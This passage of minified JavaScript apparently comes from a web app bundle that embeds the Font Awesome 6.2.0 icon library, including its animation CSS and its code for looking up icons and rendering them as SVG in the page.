var(--fa-animation-direction, normal);\n -webkit-animation-duration: var(--fa-animation-duration, 1s);\n animation-duration: var(--fa-animation-duration, 1s);\n -webkit-animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n -webkit-animation-timing-function: var(--fa-animation-timing, ease-in-out);\n animation-timing-function: var(--fa-animation-timing, ease-in-out);\n}\n\n.fa-bounce {\n -webkit-animation-name: fa-bounce;\n animation-name: fa-bounce;\n -webkit-animation-delay: var(--fa-animation-delay, 0s);\n animation-delay: var(--fa-animation-delay, 0s);\n -webkit-animation-direction: var(--fa-animation-direction, normal);\n animation-direction: var(--fa-animation-direction, normal);\n -webkit-animation-duration: var(--fa-animation-duration, 1s);\n animation-duration: var(--fa-animation-duration, 1s);\n -webkit-animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n -webkit-animation-timing-function: var(--fa-animation-timing, cubic-bezier(0.28, 0.84, 0.42, 1));\n animation-timing-function: var(--fa-animation-timing, cubic-bezier(0.28, 0.84, 0.42, 1));\n}\n\n.fa-fade {\n -webkit-animation-name: fa-fade;\n animation-name: fa-fade;\n -webkit-animation-delay: var(--fa-animation-delay, 0s);\n animation-delay: var(--fa-animation-delay, 0s);\n -webkit-animation-direction: var(--fa-animation-direction, normal);\n animation-direction: var(--fa-animation-direction, normal);\n -webkit-animation-duration: var(--fa-animation-duration, 1s);\n animation-duration: var(--fa-animation-duration, 1s);\n -webkit-animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n -webkit-animation-timing-function: var(--fa-animation-timing, cubic-bezier(0.4, 0, 0.6, 1));\n animation-timing-function: var(--fa-animation-timing, cubic-bezier(0.4, 0, 0.6, 1));\n}\n\n.fa-beat-fade {\n -webkit-animation-name: fa-beat-fade;\n animation-name: fa-beat-fade;\n -webkit-animation-delay: var(--fa-animation-delay, 0s);\n animation-delay: var(--fa-animation-delay, 0s);\n -webkit-animation-direction: var(--fa-animation-direction, normal);\n animation-direction: var(--fa-animation-direction, normal);\n -webkit-animation-duration: var(--fa-animation-duration, 1s);\n animation-duration: var(--fa-animation-duration, 1s);\n -webkit-animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n -webkit-animation-timing-function: var(--fa-animation-timing, cubic-bezier(0.4, 0, 0.6, 1));\n animation-timing-function: var(--fa-animation-timing, cubic-bezier(0.4, 0, 0.6, 1));\n}\n\n.fa-flip {\n -webkit-animation-name: fa-flip;\n animation-name: fa-flip;\n -webkit-animation-delay: var(--fa-animation-delay, 0s);\n animation-delay: var(--fa-animation-delay, 0s);\n -webkit-animation-direction: var(--fa-animation-direction, normal);\n animation-direction: var(--fa-animation-direction, normal);\n -webkit-animation-duration: var(--fa-animation-duration, 1s);\n animation-duration: var(--fa-animation-duration, 1s);\n -webkit-animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n -webkit-animation-timing-function: var(--fa-animation-timing, ease-in-out);\n animation-timing-function: var(--fa-animation-timing, ease-in-out);\n}\n\n.fa-shake {\n -webkit-animation-name: fa-shake;\n animation-name: fa-shake;\n -webkit-animation-delay: var(--fa-animation-delay, 0s);\n animation-delay: var(--fa-animation-delay, 0s);\n -webkit-animation-direction: var(--fa-animation-direction, normal);\n animation-direction: var(--fa-animation-direction, normal);\n -webkit-animation-duration: var(--fa-animation-duration, 1s);\n animation-duration: var(--fa-animation-duration, 1s);\n -webkit-animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n -webkit-animation-timing-function: var(--fa-animation-timing, linear);\n animation-timing-function: var(--fa-animation-timing, linear);\n}\n\n.fa-spin {\n -webkit-animation-name: fa-spin;\n animation-name: fa-spin;\n -webkit-animation-delay: var(--fa-animation-delay, 0s);\n animation-delay: var(--fa-animation-delay, 0s);\n -webkit-animation-direction: var(--fa-animation-direction, normal);\n animation-direction: var(--fa-animation-direction, normal);\n -webkit-animation-duration: var(--fa-animation-duration, 2s);\n animation-duration: var(--fa-animation-duration, 2s);\n -webkit-animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n -webkit-animation-timing-function: var(--fa-animation-timing, linear);\n animation-timing-function: var(--fa-animation-timing, linear);\n}\n\n.fa-spin-reverse {\n --fa-animation-direction: reverse;\n}\n\n.fa-pulse,\n.fa-spin-pulse {\n -webkit-animation-name: fa-spin;\n animation-name: fa-spin;\n -webkit-animation-direction: var(--fa-animation-direction, normal);\n animation-direction: var(--fa-animation-direction, normal);\n -webkit-animation-duration: var(--fa-animation-duration, 1s);\n animation-duration: var(--fa-animation-duration, 1s);\n -webkit-animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n -webkit-animation-timing-function: var(--fa-animation-timing, steps(8));\n animation-timing-function: var(--fa-animation-timing, steps(8));\n}\n\n@media (prefers-reduced-motion: reduce) {\n .fa-beat,\n.fa-bounce,\n.fa-fade,\n.fa-beat-fade,\n.fa-flip,\n.fa-pulse,\n.fa-shake,\n.fa-spin,\n.fa-spin-pulse {\n -webkit-animation-delay: -1ms;\n animation-delay: -1ms;\n -webkit-animation-duration: 1ms;\n animation-duration: 1ms;\n -webkit-animation-iteration-count: 1;\n animation-iteration-count: 1;\n transition-delay: 0s;\n transition-duration: 0s;\n }\n}\n@-webkit-keyframes fa-beat {\n 0%, 90% {\n -webkit-transform: scale(1);\n transform: scale(1);\n }\n 45% {\n -webkit-transform: scale(var(--fa-beat-scale, 1.25));\n transform: scale(var(--fa-beat-scale, 1.25));\n }\n}\n@keyframes fa-beat {\n 0%, 90% {\n -webkit-transform: scale(1);\n transform: scale(1);\n }\n 45% {\n -webkit-transform: scale(var(--fa-beat-scale, 1.25));\n transform: scale(var(--fa-beat-scale, 1.25));\n }\n}\n@-webkit-keyframes fa-bounce {\n 0% {\n -webkit-transform: scale(1, 1) translateY(0);\n transform: scale(1, 1) translateY(0);\n }\n 10% {\n -webkit-transform: scale(var(--fa-bounce-start-scale-x, 1.1), var(--fa-bounce-start-scale-y, 0.9)) translateY(0);\n transform: scale(var(--fa-bounce-start-scale-x, 1.1), var(--fa-bounce-start-scale-y, 0.9)) translateY(0);\n }\n 30% {\n -webkit-transform: scale(var(--fa-bounce-jump-scale-x, 0.9), var(--fa-bounce-jump-scale-y, 1.1)) translateY(var(--fa-bounce-height, -0.5em));\n transform: scale(var(--fa-bounce-jump-scale-x, 0.9), var(--fa-bounce-jump-scale-y, 1.1)) translateY(var(--fa-bounce-height, -0.5em));\n }\n 50% {\n -webkit-transform: scale(var(--fa-bounce-land-scale-x, 1.05), var(--fa-bounce-land-scale-y, 0.95)) translateY(0);\n transform: scale(var(--fa-bounce-land-scale-x, 1.05), var(--fa-bounce-land-scale-y, 0.95)) translateY(0);\n }\n 57% {\n -webkit-transform: scale(1, 1) translateY(var(--fa-bounce-rebound, -0.125em));\n transform: scale(1, 1) translateY(var(--fa-bounce-rebound, -0.125em));\n }\n 64% {\n -webkit-transform: scale(1, 1) translateY(0);\n transform: scale(1, 1) translateY(0);\n }\n 100% {\n -webkit-transform: scale(1, 1) translateY(0);\n transform: scale(1, 1) translateY(0);\n }\n}\n@keyframes fa-bounce {\n 0% {\n -webkit-transform: scale(1, 1) translateY(0);\n transform: scale(1, 1) translateY(0);\n }\n 10% {\n -webkit-transform: scale(var(--fa-bounce-start-scale-x, 1.1), var(--fa-bounce-start-scale-y, 0.9)) translateY(0);\n transform: scale(var(--fa-bounce-start-scale-x, 1.1), var(--fa-bounce-start-scale-y, 0.9)) translateY(0);\n }\n 30% {\n -webkit-transform: scale(var(--fa-bounce-jump-scale-x, 0.9), var(--fa-bounce-jump-scale-y, 1.1)) translateY(var(--fa-bounce-height, -0.5em));\n transform: scale(var(--fa-bounce-jump-scale-x, 0.9), var(--fa-bounce-jump-scale-y, 1.1)) translateY(var(--fa-bounce-height, -0.5em));\n }\n 50% {\n -webkit-transform: scale(var(--fa-bounce-land-scale-x, 1.05), var(--fa-bounce-land-scale-y, 0.95)) translateY(0);\n transform: scale(var(--fa-bounce-land-scale-x, 1.05), var(--fa-bounce-land-scale-y, 0.95)) translateY(0);\n }\n 57% {\n -webkit-transform: scale(1, 1) translateY(var(--fa-bounce-rebound, -0.125em));\n transform: scale(1, 1) translateY(var(--fa-bounce-rebound, -0.125em));\n }\n 64% {\n -webkit-transform: scale(1, 1) translateY(0);\n transform: scale(1, 1) translateY(0);\n }\n 100% {\n -webkit-transform: scale(1, 1) translateY(0);\n transform: scale(1, 1) translateY(0);\n }\n}\n@-webkit-keyframes fa-fade {\n 50% {\n opacity: var(--fa-fade-opacity, 0.4);\n }\n}\n@keyframes fa-fade {\n 50% {\n opacity: var(--fa-fade-opacity, 0.4);\n }\n}\n@-webkit-keyframes fa-beat-fade {\n 0%, 100% {\n opacity: var(--fa-beat-fade-opacity, 0.4);\n -webkit-transform: scale(1);\n transform: scale(1);\n }\n 50% {\n opacity: 1;\n -webkit-transform: scale(var(--fa-beat-fade-scale, 1.125));\n transform: scale(var(--fa-beat-fade-scale, 1.125));\n }\n}\n@keyframes fa-beat-fade {\n 0%, 100% {\n opacity: var(--fa-beat-fade-opacity, 0.4);\n -webkit-transform: scale(1);\n transform: scale(1);\n }\n 50% {\n opacity: 1;\n -webkit-transform: scale(var(--fa-beat-fade-scale, 1.125));\n transform: scale(var(--fa-beat-fade-scale, 1.125));\n }\n}\n@-webkit-keyframes fa-flip {\n 50% {\n -webkit-transform: rotate3d(var(--fa-flip-x, 0), var(--fa-flip-y, 1), var(--fa-flip-z, 0), var(--fa-flip-angle, -180deg));\n transform: rotate3d(var(--fa-flip-x, 0), var(--fa-flip-y, 1), var(--fa-flip-z, 0), var(--fa-flip-angle, -180deg));\n }\n}\n@keyframes fa-flip {\n 50% {\n -webkit-transform: rotate3d(var(--fa-flip-x, 0), var(--fa-flip-y, 1), var(--fa-flip-z, 0), var(--fa-flip-angle, -180deg));\n transform: rotate3d(var(--fa-flip-x, 0), var(--fa-flip-y, 1), var(--fa-flip-z, 0), var(--fa-flip-angle, -180deg));\n }\n}\n@-webkit-keyframes fa-shake {\n 0% {\n -webkit-transform: rotate(-15deg);\n transform: rotate(-15deg);\n }\n 4% {\n -webkit-transform: rotate(15deg);\n transform: rotate(15deg);\n }\n 8%, 24% {\n -webkit-transform: rotate(-18deg);\n transform: rotate(-18deg);\n }\n 12%, 28% {\n -webkit-transform: rotate(18deg);\n transform: rotate(18deg);\n }\n 16% {\n -webkit-transform: rotate(-22deg);\n transform: rotate(-22deg);\n }\n 20% {\n -webkit-transform: rotate(22deg);\n transform: rotate(22deg);\n }\n 32% {\n -webkit-transform: rotate(-12deg);\n transform: rotate(-12deg);\n }\n 36% {\n -webkit-transform: rotate(12deg);\n transform: rotate(12deg);\n }\n 40%, 100% {\n -webkit-transform: rotate(0deg);\n transform: rotate(0deg);\n }\n}\n@keyframes fa-shake {\n 0% {\n -webkit-transform: rotate(-15deg);\n transform: rotate(-15deg);\n }\n 4% {\n -webkit-transform: rotate(15deg);\n transform: rotate(15deg);\n }\n 8%, 24% {\n -webkit-transform: rotate(-18deg);\n transform: rotate(-18deg);\n }\n 12%, 28% {\n -webkit-transform: rotate(18deg);\n transform: rotate(18deg);\n }\n 16% {\n -webkit-transform: rotate(-22deg);\n transform: rotate(-22deg);\n }\n 20% {\n -webkit-transform: rotate(22deg);\n transform: rotate(22deg);\n }\n 32% {\n -webkit-transform: rotate(-12deg);\n transform: rotate(-12deg);\n }\n 36% {\n -webkit-transform: rotate(12deg);\n transform: rotate(12deg);\n }\n 40%, 100% {\n -webkit-transform: rotate(0deg);\n transform: rotate(0deg);\n }\n}\n@-webkit-keyframes fa-spin {\n 0% {\n -webkit-transform: rotate(0deg);\n transform: rotate(0deg);\n }\n 100% {\n -webkit-transform: rotate(360deg);\n transform: rotate(360deg);\n }\n}\n@keyframes fa-spin {\n 0% {\n -webkit-transform: rotate(0deg);\n transform: rotate(0deg);\n }\n 100% {\n -webkit-transform: rotate(360deg);\n transform: rotate(360deg);\n }\n}\n.fa-rotate-90 {\n -webkit-transform: rotate(90deg);\n transform: rotate(90deg);\n}\n\n.fa-rotate-180 {\n -webkit-transform: rotate(180deg);\n transform: rotate(180deg);\n}\n\n.fa-rotate-270 {\n -webkit-transform: rotate(270deg);\n transform: rotate(270deg);\n}\n\n.fa-flip-horizontal {\n -webkit-transform: scale(-1, 1);\n transform: scale(-1, 1);\n}\n\n.fa-flip-vertical {\n -webkit-transform: scale(1, -1);\n transform: scale(1, -1);\n}\n\n.fa-flip-both,\n.fa-flip-horizontal.fa-flip-vertical {\n -webkit-transform: scale(-1, -1);\n transform: scale(-1, -1);\n}\n\n.fa-rotate-by {\n -webkit-transform: rotate(var(--fa-rotate-angle, none));\n transform: rotate(var(--fa-rotate-angle, none));\n}\n\n.fa-stack {\n display: inline-block;\n vertical-align: middle;\n height: 2em;\n position: relative;\n width: 2.5em;\n}\n\n.fa-stack-1x,\n.fa-stack-2x {\n bottom: 0;\n left: 0;\n margin: auto;\n position: absolute;\n right: 0;\n top: 0;\n z-index: var(--fa-stack-z-index, auto);\n}\n\n.svg-inline--fa.fa-stack-1x {\n height: 1em;\n width: 1.25em;\n}\n.svg-inline--fa.fa-stack-2x {\n height: 2em;\n width: 2.5em;\n}\n\n.fa-inverse {\n color: var(--fa-inverse, #fff);\n}\n\n.sr-only,\n.fa-sr-only {\n position: absolute;\n width: 1px;\n height: 1px;\n padding: 0;\n margin: -1px;\n overflow: hidden;\n clip: rect(0, 0, 0, 0);\n white-space: nowrap;\n border-width: 0;\n}\n\n.sr-only-focusable:not(:focus),\n.fa-sr-only-focusable:not(:focus) {\n position: absolute;\n width: 1px;\n height: 1px;\n padding: 0;\n margin: -1px;\n overflow: hidden;\n clip: rect(0, 0, 0, 0);\n white-space: nowrap;\n border-width: 0;\n}\n\n.svg-inline--fa .fa-primary {\n fill: var(--fa-primary-color, currentColor);\n opacity: var(--fa-primary-opacity, 1);\n}\n\n.svg-inline--fa .fa-secondary {\n fill: var(--fa-secondary-color, currentColor);\n opacity: var(--fa-secondary-opacity, 0.4);\n}\n\n.svg-inline--fa.fa-swap-opacity .fa-primary {\n opacity: var(--fa-secondary-opacity, 0.4);\n}\n\n.svg-inline--fa.fa-swap-opacity .fa-secondary {\n opacity: var(--fa-primary-opacity, 1);\n}\n\n.svg-inline--fa mask .fa-primary,\n.svg-inline--fa mask .fa-secondary {\n fill: black;\n}\n\n.fad.fa-inverse,\n.fa-duotone.fa-inverse {\n color: var(--fa-inverse, #fff);\n}';if(e!==t||i!==a){var r=new RegExp("\\.".concat(t,"\\-"),"g"),c=new RegExp("\\--".concat(t,"\\-"),"g"),d=new RegExp("\\.".concat(a),"g");n=n.replace(r,".".concat(e,"-")).replace(c,"--".concat(e,"-")).replace(d,".".concat(i))}return n}var AB=!1;function W8(){Ca.autoAddCss&&!AB&&(function nbe(t){if(t&&Kh){var a=Mr.createElement("style");a.setAttribute("type","text/css"),a.innerHTML=t;for(var e=Mr.head.childNodes,i=null,n=e.length-1;n>-1;n--){var r=e[n],c=(r.tagName||"").toUpperCase();["STYLE","LINK"].indexOf(c)>-1&&(i=r)}Mr.head.insertBefore(a,i)}}(vB()),AB=!0)}var dbe={mixout:function(){return{dom:{css:vB,insertCss:W8}}},hooks:function(){return{beforeDOMElementCreation:function(){W8()},beforeI2svg:function(){W8()}}}},Yh=Mp||{};Yh[Xh]||(Yh[Xh]={}),Yh[Xh].styles||(Yh[Xh].styles={}),Yh[Xh].hooks||(Yh[Xh].hooks={}),Yh[Xh].shims||(Yh[Xh].shims=[]);var Im=Yh[Xh],TB=[],AA=!1;function ube(t){!Kh||(AA?setTimeout(t,0):TB.push(t))}function Ab(t){var a=t.tag,e=t.attributes,i=void 0===e?{}:e,n=t.children,r=void 0===n?[]:n;return"string"==typeof t?MB(t):"<".concat(a," ").concat(function rbe(t){return Object.keys(t||{}).reduce(function(a,e){return a+"".concat(e,'="').concat(MB(t[e]),'" ')},"").trim()}(i),">").concat(r.map(Ab).join(""),"")}function EB(t,a,e){if(t&&t[a]&&t[a][e])return{prefix:a,iconName:e,icon:t[a][e]}}Kh&&((AA=(Mr.documentElement.doScroll?/^loaded|^c/:/^loaded|^i|^c/).test(Mr.readyState))||Mr.addEventListener("DOMContentLoaded",function t(){Mr.removeEventListener("DOMContentLoaded",t),AA=1,TB.map(function(a){return a()})}));var F8=function(a,e,i,n){var T,k,q,r=Object.keys(a),c=r.length,d=void 0!==n?function(a,e){return function(i,n,r,c){return a.call(e,i,n,r,c)}}(e,n):e;for(void 0===i?(T=1,q=a[r[0]]):(T=0,q=i);T=55296&&n<=56319&&e2&&void 0!==arguments[2]?arguments[2]:{},i=e.skipHooks,n=void 0!==i&&i,r=DB(a);"function"!=typeof Im.hooks.addPack||n?Im.styles[t]=ia(ia({},Im.styles[t]||{}),r):Im.hooks.addPack(t,DB(a)),"fas"===t&&B8("fa",a)}var TA,EA,DA,Q1=Im.styles,_be=Im.shims,gbe=(Ws(TA={},vr,Object.values(Cb[vr])),Ws(TA,Qr,Object.values(Cb[Qr])),TA),H8=null,xB={},wB={},IB={},RB={},SB={},Cbe=(Ws(EA={},vr,Object.keys(_b[vr])),Ws(EA,Qr,Object.keys(_b[Qr])),EA);function bbe(t,a){var e=a.split("-"),i=e[0],n=e.slice(1).join("-");return i!==t||""===n||function ybe(t){return~Zye.indexOf(t)}(n)?null:n}var kB=function(){var a=function(r){return F8(Q1,function(c,d,T){return c[T]=F8(d,r,{}),c},{})};xB=a(function(n,r,c){return r[3]&&(n[r[3]]=c),r[2]&&r[2].filter(function(T){return"number"==typeof T}).forEach(function(T){n[T.toString(16)]=c}),n}),wB=a(function(n,r,c){return n[c]=c,r[2]&&r[2].filter(function(T){return"string"==typeof T}).forEach(function(T){n[T]=c}),n}),SB=a(function(n,r,c){var d=r[2];return n[c]=c,d.forEach(function(T){n[T]=c}),n});var e="far"in Q1||Ca.autoFetchSvg,i=F8(_be,function(n,r){var c=r[0],d=r[1],T=r[2];return"far"===d&&!e&&(d="fas"),"string"==typeof c&&(n.names[c]={prefix:d,iconName:T}),"number"==typeof c&&(n.unicodes[c.toString(16)]={prefix:d,iconName:T}),n},{names:{},unicodes:{}});IB=i.names,RB=i.unicodes,H8=xA(Ca.styleDefault,{family:Ca.familyDefault})};function U8(t,a){return(xB[t]||{})[a]}function Tg(t,a){return(SB[t]||{})[a]}function PB(t){return IB[t]||{prefix:null,iconName:null}}function Ap(){return H8}function xA(t){var a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},e=a.family,i=void 0===e?vr:e,n=_b[i][t],r=gb[i][t]||gb[i][n],c=t in Im.styles?t:null;return r||c||null}(function abe(t){Mb.push(t)})(function(t){H8=xA(t.styleDefault,{family:Ca.familyDefault})}),kB();var OB=(Ws(DA={},vr,Object.keys(Cb[vr])),Ws(DA,Qr,Object.keys(Cb[Qr])),DA);function wA(t){var a,e=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},i=e.skipLookups,n=void 0!==i&&i,r=(Ws(a={},vr,"".concat(Ca.cssPrefix,"-").concat(vr)),Ws(a,Qr,"".concat(Ca.cssPrefix,"-").concat(Qr)),a),c=null,d=vr;(t.includes(r[vr])||t.some(function(k){return OB[vr].includes(k)}))&&(d=vr),(t.includes(r[Qr])||t.some(function(k){return OB[Qr].includes(k)}))&&(d=Qr);var T=t.reduce(function(k,q){var Y=bbe(Ca.cssPrefix,q);if(Q1[q]?(q=gbe[d].includes(q)?Qye[d][q]:q,c=q,k.prefix=q):Cbe[d].indexOf(q)>-1?(c=q,k.prefix=xA(q,{family:d})):Y?k.iconName=Y:q!==Ca.replacementClass&&q!==r[vr]&&q!==r[Qr]&&k.rest.push(q),!n&&k.prefix&&k.iconName){var te="fa"===c?PB(k.iconName):{},pe=Tg(k.prefix,k.iconName);te.prefix&&(c=null),k.iconName=te.iconName||pe||k.iconName,k.prefix=te.prefix||k.prefix,"far"===k.prefix&&!Q1.far&&Q1.fas&&!Ca.autoFetchSvg&&(k.prefix="fas")}return k},{prefix:null,iconName:null,rest:[]});return(t.includes("fa-brands")||t.includes("fab"))&&(T.prefix="fab"),(t.includes("fa-duotone")||t.includes("fad"))&&(T.prefix="fad"),!T.prefix&&d===Qr&&(Q1.fass||Ca.autoFetchSvg)&&(T.prefix="fass",T.iconName=Tg(T.prefix,T.iconName)||T.iconName),("fa"===T.prefix||"fa"===c)&&(T.prefix=Ap()||"fas"),T}var Abe=function(){function t(){(function Oye(t,a){if(!(t instanceof a))throw new TypeError("Cannot call a class as a function")})(this,t),this.definitions={}}return function Nye(t,a,e){a&&nB(t.prototype,a),e&&nB(t,e),Object.defineProperty(t,"prototype",{writable:!1})}(t,[{key:"add",value:function(){for(var e=this,i=arguments.length,n=new Array(i),r=0;r0&&q.forEach(function(Y){"string"==typeof Y&&(e[d][Y]=k)}),e[d][T]=k}),e}}]),t}(),NB=[],$1={},K1={},Tbe=Object.keys(K1);function G8(t,a){for(var e=arguments.length,i=new Array(e>2?e-2:0),n=2;n1?a-1:0),i=1;i0&&void 0!==arguments[0]?arguments[0]:{};return Kh?(Eg("beforeI2svg",a),Jh("pseudoElements2svg",a),Jh("i2svg",a)):Promise.reject("Operation requires a DOM of some kind.")},watch:function(){var a=arguments.length>0&&void 0!==arguments[0]?arguments[0]:{},e=a.autoReplaceSvgRoot;!1===Ca.autoReplaceSvg&&(Ca.autoReplaceSvg=!0),Ca.observeMutations=!0,ube(function(){Ibe({autoReplaceSvgRoot:e}),Eg("watch",a)})}},Ql={noAuto:function(){Ca.autoReplaceSvg=!1,Ca.observeMutations=!1,Eg("noAuto")},config:Ca,dom:xbe,parse:{icon:function(a){if(null===a)return null;if("object"===fA(a)&&a.prefix&&a.iconName)return{prefix:a.prefix,iconName:Tg(a.prefix,a.iconName)||a.iconName};if(Array.isArray(a)&&2===a.length){var e=0===a[1].indexOf("fa-")?a[1].slice(3):a[1],i=xA(a[0]);return{prefix:i,iconName:Tg(i,e)||e}}if("string"==typeof a&&(a.indexOf("".concat(Ca.cssPrefix,"-"))>-1||a.match($ye))){var n=wA(a.split(" "),{skipLookups:!0});return{prefix:n.prefix||Ap(),iconName:Tg(n.prefix,n.iconName)||n.iconName}}if("string"==typeof a){var r=Ap();return{prefix:r,iconName:Tg(r,a)||a}}}},library:LB,findIconDefinition:j8,toHtml:Ab},Ibe=function(){var a=arguments.length>0&&void 0!==arguments[0]?arguments[0]:{},e=a.autoReplaceSvgRoot,i=void 0===e?Mr:e;(Object.keys(Im.styles).length>0||Ca.autoFetchSvg)&&Kh&&Ca.autoReplaceSvg&&Ql.dom.i2svg({node:i})};function IA(t,a){return Object.defineProperty(t,"abstract",{get:a}),Object.defineProperty(t,"html",{get:function(){return t.abstract.map(function(i){return Ab(i)})}}),Object.defineProperty(t,"node",{get:function(){if(Kh){var i=Mr.createElement("div");return i.innerHTML=t.html,i.children}}}),t}function Q8(t){var a=t.icons,e=a.main,i=a.mask,n=t.prefix,r=t.iconName,c=t.transform,d=t.symbol,T=t.title,k=t.maskId,q=t.titleId,Y=t.extra,te=t.watchable,pe=void 0!==te&&te,Re=i.found?i:e,Fe=Re.width,Ne=Re.height,et="fak"===n,ut=[Ca.replacementClass,r?"".concat(Ca.cssPrefix,"-").concat(r):""].filter(function(Ai){return-1===Y.classes.indexOf(Ai)}).filter(function(Ai){return""!==Ai||!!Ai}).concat(Y.classes).join(" "),Ze={children:[],attributes:ia(ia({},Y.attributes),{},{"data-prefix":n,"data-icon":r,class:ut,role:Y.attributes.role||"img",xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 ".concat(Fe," ").concat(Ne)})},yt=et&&!~Y.classes.indexOf("fa-fw")?{width:"".concat(Fe/Ne*16*.0625,"em")}:{};pe&&(Ze.attributes[vg]=""),T&&(Ze.children.push({tag:"title",attributes:{id:Ze.attributes["aria-labelledby"]||"title-".concat(q||vb())},children:[T]}),delete Ze.attributes.title);var It=ia(ia({},Ze),{},{prefix:n,iconName:r,main:e,mask:i,maskId:k,transform:c,symbol:d,styles:ia(ia({},yt),Y.styles)}),St=i.found&&e.found?Jh("generateAbstractMask",It)||{children:[],attributes:{}}:Jh("generateAbstractIcon",It)||{children:[],attributes:{}},oi=St.attributes;return It.children=St.children,It.attributes=oi,d?function Sbe(t){var e=t.iconName,i=t.children,n=t.attributes,r=t.symbol,c=!0===r?"".concat(t.prefix,"-").concat(Ca.cssPrefix,"-").concat(e):r;return[{tag:"svg",attributes:{style:"display: none;"},children:[{tag:"symbol",attributes:ia(ia({},n),{},{id:c}),children:i}]}]}(It):function Rbe(t){var a=t.children,e=t.main,i=t.mask,n=t.attributes,r=t.styles,c=t.transform;if(z8(c)&&e.found&&!i.found){var k={x:e.width/e.height/2,y:.5};n.style=vA(ia(ia({},r),{},{"transform-origin":"".concat(k.x+c.x/16,"em ").concat(k.y+c.y/16,"em")}))}return[{tag:"svg",attributes:n,children:a}]}(It)}function zB(t){var a=t.content,e=t.width,i=t.height,n=t.transform,r=t.title,c=t.extra,d=t.watchable,T=void 0!==d&&d,k=ia(ia(ia({},c.attributes),r?{title:r}:{}),{},{class:c.classes.join(" ")});T&&(k[vg]="");var q=ia({},c.styles);z8(n)&&(q.transform=function cbe(t){var a=t.transform,e=t.width,n=t.height,r=void 0===n?16:n,c=t.startCentered,d=void 0!==c&&c,T="";return T+=d&&hB?"translate(".concat(a.x/16-(void 0===e?16:e)/2,"em, ").concat(a.y/16-r/2,"em) "):d?"translate(calc(-50% + ".concat(a.x/16,"em), calc(-50% + ").concat(a.y/16,"em)) "):"translate(".concat(a.x/16,"em, ").concat(a.y/16,"em) "),(T+="scale(".concat(a.size/16*(a.flipX?-1:1),", ").concat(a.size/16*(a.flipY?-1:1),") "))+"rotate(".concat(a.rotate,"deg) ")}({transform:n,startCentered:!0,width:e,height:i}),q["-webkit-transform"]=q.transform);var Y=vA(q);Y.length>0&&(k.style=Y);var te=[];return te.push({tag:"span",attributes:k,children:[a]}),r&&te.push({tag:"span",attributes:{class:"sr-only"},children:[r]}),te}function kbe(t){var a=t.content,e=t.title,i=t.extra,n=ia(ia(ia({},i.attributes),e?{title:e}:{}),{},{class:i.classes.join(" ")}),r=vA(i.styles);r.length>0&&(n.style=r);var c=[];return c.push({tag:"span",attributes:n,children:[a]}),e&&c.push({tag:"span",attributes:{class:"sr-only"},children:[e]}),c}var $8=Im.styles;function K8(t){var a=t[0],e=t[1],r=w8(t.slice(4),1)[0];return{found:!0,width:a,height:e,icon:Array.isArray(r)?{tag:"g",attributes:{class:"".concat(Ca.cssPrefix,"-").concat("duotone-group")},children:[{tag:"path",attributes:{class:"".concat(Ca.cssPrefix,"-").concat("secondary"),fill:"currentColor",d:r[0]}},{tag:"path",attributes:{class:"".concat(Ca.cssPrefix,"-").concat("primary"),fill:"currentColor",d:r[1]}}]}:{tag:"path",attributes:{fill:"currentColor",d:r}}}}var Pbe={found:!1,width:512,height:512};function X8(t,a){var e=a;return"fa"===a&&null!==Ca.styleDefault&&(a=Ap()),new Promise(function(i,n){if(Jh("missingIconAbstract"),"fa"===e){var c=PB(t)||{};t=c.iconName||t,a=c.prefix||a}if(t&&a&&$8[a]&&$8[a][t])return i(K8($8[a][t]));(function Obe(t,a){!gB&&!Ca.showMissingIcons&&t&&console.error('Icon with name "'.concat(t,'" and prefix "').concat(a,'" is missing.'))})(t,a),i(ia(ia({},Pbe),{},{icon:Ca.showMissingIcons&&t&&Jh("missingIconAbstract")||{}}))})}var WB=function(){},Y8=Ca.measurePerformance&&_A&&_A.mark&&_A.measure?_A:{mark:WB,measure:WB},Tb='FA "6.2.0"',J8_begin=function(a){return Y8.mark("".concat(Tb," ").concat(a," begins")),function(){return function(a){Y8.mark("".concat(Tb," ").concat(a," ends")),Y8.measure("".concat(Tb," ").concat(a),"".concat(Tb," ").concat(a," begins"),"".concat(Tb," ").concat(a," ends"))}(a)}},RA=function(){};function VB(t){return"string"==typeof(t.getAttribute?t.getAttribute(vg):null)}function Fbe(t){return Mr.createElementNS("http://www.w3.org/2000/svg",t)}function Vbe(t){return Mr.createElement(t)}function BB(t){var a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},e=a.ceFn,i=void 0===e?"svg"===t.tag?Fbe:Vbe:e;if("string"==typeof t)return Mr.createTextNode(t);var n=i(t.tag);Object.keys(t.attributes||[]).forEach(function(c){n.setAttribute(c,t.attributes[c])});var r=t.children||[];return r.forEach(function(c){n.appendChild(BB(c,{ceFn:i}))}),n}var SA={replace:function(a){var e=a[0];if(e.parentNode)if(a[1].forEach(function(n){e.parentNode.insertBefore(BB(n),e)}),null===e.getAttribute(vg)&&Ca.keepOriginalSource){var i=Mr.createComment(function Bbe(t){var a=" ".concat(t.outerHTML," ");return"".concat(a,"Font Awesome fontawesome.com ")}(e));e.parentNode.replaceChild(i,e)}else e.remove()},nest:function(a){var e=a[0],i=a[1];if(~L8(e).indexOf(Ca.replacementClass))return SA.replace(a);var n=new RegExp("".concat(Ca.cssPrefix,"-.*"));if(delete i[0].attributes.id,i[0].attributes.class){var r=i[0].attributes.class.split(" ").reduce(function(d,T){return T===Ca.replacementClass||T.match(n)?d.toSvg.push(T):d.toNode.push(T),d},{toNode:[],toSvg:[]});i[0].attributes.class=r.toSvg.join(" 